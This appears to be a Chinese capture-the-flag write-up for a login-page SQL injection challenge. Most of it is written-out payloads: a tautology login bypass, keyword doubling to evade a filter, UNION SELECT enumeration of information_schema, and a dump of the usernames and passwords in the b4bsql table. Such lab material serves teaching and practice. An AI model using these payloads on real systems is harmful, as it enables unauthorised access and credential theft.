1.我们打开环境之后发现是一个登陆页面,先尝试一下万能密码登录
admin
1’ or 1=1#
我们可以看出是字符型注入,然后我们再把or换成||看看结果是不是一样的
1‘ || 1=1#
然后我们就发现登陆成功,应该是or被过滤了,我们要双写绕过它,我们接着查看它的列数
1' oorrder bbyy 3# 只有三列 4会报错
我们接着爆出它的显示位
1' ununionion selselectect 1,2,3#
我们发现2和3在页面显示,接着查看它的数据库
1' ununionion selselectect 1,2,database()# 这里把3换成database是因为3在页面显示,我们也可以把2换成database
发现它的数据库名称是geek,接着看表
1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#
如果我们在尝试这条语句的时候,发现报错,可能是环境的问题,我们用括号把information到tables括起来就不用空格了,一般情况下是不会有问题
group_concat是全部显示,limit是只显示特定的
我们发现有俩张表,我们先查看第一张表,看看有什么内容,不行再换第二张表
1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#
这里可能出现我们想要的内容,接着查询
1' ununionion selselectect 1,2,group_concat(concat_ws(id,username,passwoorrd)) frfromom geek.b4bsql#
1' ununionion selselectect 1,2,group_concat(username,id,passwoorrd) frfromom geek.b4bsql#
concat_ws是将id置于中间,我们也可以手动将它在中间,隔开usernmae和password
俩条语句都可以,最终都可以拿到答案
这道题最明显的是双写绕过,然后我们需要去拼接双写语句达到绕过的目的,双写的方式也不一定是固定的,这道题在我们尝试的时候也会发现其实它也过滤好几个单词,有时候我们需要部分双写,也不需要整个单词双写,因为它不是整个单词都过滤